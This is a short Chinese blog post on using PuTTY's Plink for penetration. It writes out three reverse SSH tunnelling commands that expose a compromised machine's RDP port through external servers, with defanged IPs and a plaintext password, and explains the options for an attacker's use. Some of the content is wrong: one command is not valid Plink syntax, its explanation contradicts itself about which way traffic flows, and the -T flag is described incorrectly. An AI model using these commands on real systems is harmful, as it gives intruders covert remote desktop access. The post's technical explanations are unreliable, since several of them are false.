利用Plink网络管理工具进行渗透

Plink是PuTTY SSH客户端的命令行连接工具。

一、使用Plink来配置端口转发规则允许从远程主机进行 RDP 访问。
命令行如下:

plink.exe 151.236.19[.]91 -P [REMOVED]-C -N -R 0.0.0.0:54231:127.0.0.1:3389 -l [REMOVED] -pw [REMOVED]

将所有可用接口上的端口 3389 转发到端口 999:

plink.exe [REMOVED] -pw [REMOVED] -P [REMOVED] -2 -4 -T -N -C -R 0.0.0.0:999:127.0.0.1:3389

命令中提供的选项执行以下操作:
-2 -4:为连接启用 SSH 版本 2 和 IPv4 协议。
-T:为远程会话请求伪终端。
-N:防止运行远程命令,通常用于设置端口
-R 0.0.0.0:999:127.0.0.1:3389:指定远程端口转发。它指示远程服务器侦听所有网络接口 (0.0.0.0) 的端口 999,并将任何传入连接转发到本地计算机(运行命令的计算机)上的端口 3389 (127.0.0.1:3389)。这有效地建立了一条隧道,允许攻击者通过 SSH 连接访问远程服务,例如 RDP。

二、使用 Plink 创建 SSH 隧道来访问 RDP 服务
命令行如下:
plink.exe ssh 78.47.218[.]106 1234qweRRR 443 10999 10.75.45.222 3389
上述命令执行以下操作:
ssh:表示正在使用 SSH 协议进行连接。
78.47.218[.]106:使用SSH连接的远程服务器的IP地址。
1234qweRRR:可能需要对远程服务器进行身份验证所需的密码。
443:远程服务器上 SSH 连接的端口号。
10999:Plink 用于创建隧道的本地端口号。
10.75.45.222:本地计算机或网络的 IP 地址。
3389:远程桌面协议 (RDP) 端口号。这表明流量正在从远程服务器的端口 3389 转发到本地计算机以进行远程桌面访问。
该命令用于从受感染的计算机设置端口转发隧道,作为访问远程服务器的 RDP 服务的方法,就像它在本地运行一样。

你可能感兴趣的:(渗透测试,1024程序员节)